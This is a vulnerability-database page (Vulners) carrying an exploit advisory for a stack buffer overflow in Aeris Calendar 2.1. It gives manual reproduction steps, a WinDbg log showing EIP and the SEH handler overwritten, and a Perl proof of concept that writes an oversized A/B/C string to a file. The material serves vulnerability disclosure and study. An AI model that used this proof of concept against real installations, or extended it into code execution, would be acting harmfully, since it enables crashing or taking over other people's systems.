Vulners
Lucene search
Aeris Calandar 2.1 - Buffer Overflow Vulnerability
- Title : Aeris Calandar 2.1 - Buffer Overflow Vulnerability
- Author : ZwX
- Date : 27/11/2015
- Software Link : http://www.esumsoft.com/download/?prod=aeriscalendar
- Vendor : http://www.esumsoft.com/
- Tested On : Windows 7 & Windows XP SP3
===============================
* Description Vulnerability : *
===============================
A typical buffer overflow vulnerability is located in the software Aeris CaLandar an
attacker manipulate the bit EIP register in order to execute the next instruction of their choice.
Example: execute the arbitrary code.
=================================================
* Manual steps to reproduce the vulnerability : *
=================================================
1. Launch Aeris Calandar.exe
2. Click Weather -> Set Location
3. Copy the AAAA...string from bof.txt to clipboard
4. Paste it the input Enter your city or zip code and press search AAAA....string click Search
5. Software will Crash
=================================
* Debug Session Logs [WINDGB] : *
=================================
Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=43434343 edx=77ce72cd esi=00000000 edi=00000000
eip=43434343 esp=0012cbe8 ebp=0012cc08 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
43434343 ?? ???
0:000> !exchain
0012cbfc: ntdll!RtlRaiseStatus+c8 (77ce72cd)
0012cfe4: ntdll!RtlRaiseStatus+c8 (77ce72cd)
0012f404: 43434343
Invalid exception stack at 42424242
0:000> d 0012f404
0012f404 42 42 42 42 43 43 43 43-00 00 00 00 80 32 44 00 BBBBCCCC.....2D. <== Control Register EIP
0012f414 a0 e6 1e 0b 01 00 00 00-08 be 51 00 60 f5 12 00 ..........Q.`...
0012f424 11 01 00 00 dd 92 38 00-fe ff ff ff c3 60 cf 77 ......8......`.w
0012f434 d0 5d cf 77 10 00 00 00-00 00 00 00 00 00 00 00 .].w............
0012f444 00 00 22 00 00 00 00 00-00 00 00 00 f4 f4 12 00 ..".............
0012f454 00 04 00 00 c0 01 05 00-f4 f4 12 00 00 00 00 00 ................
0012f464 fe ff ff ff fe c5 7f 77-94 52 7f 77 04 00 00 00 .......w.R.w....
0012f474 f2 64 4e 00 72 01 04 00-e7 c4 7f 77 c0 01 05 00 .dN.r......w....
===========================
* Proof Of Concept Perl : *
===========================
my $Buff = "\x41" x 8186;
my $Buff1 = "\x42" x 4;
my $Buff2 = "\x43" x 4;
open(MYFILE,'>>File.txt');
print MYFILE $Buff.$Buff1.$Buff2;
close(MYFILE);
print " POC Created by ZwX\n";
# 0day.today [2018-04-14] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Dec 2015 00:00Current
6.8Medium risk
Vulners AI Score6.8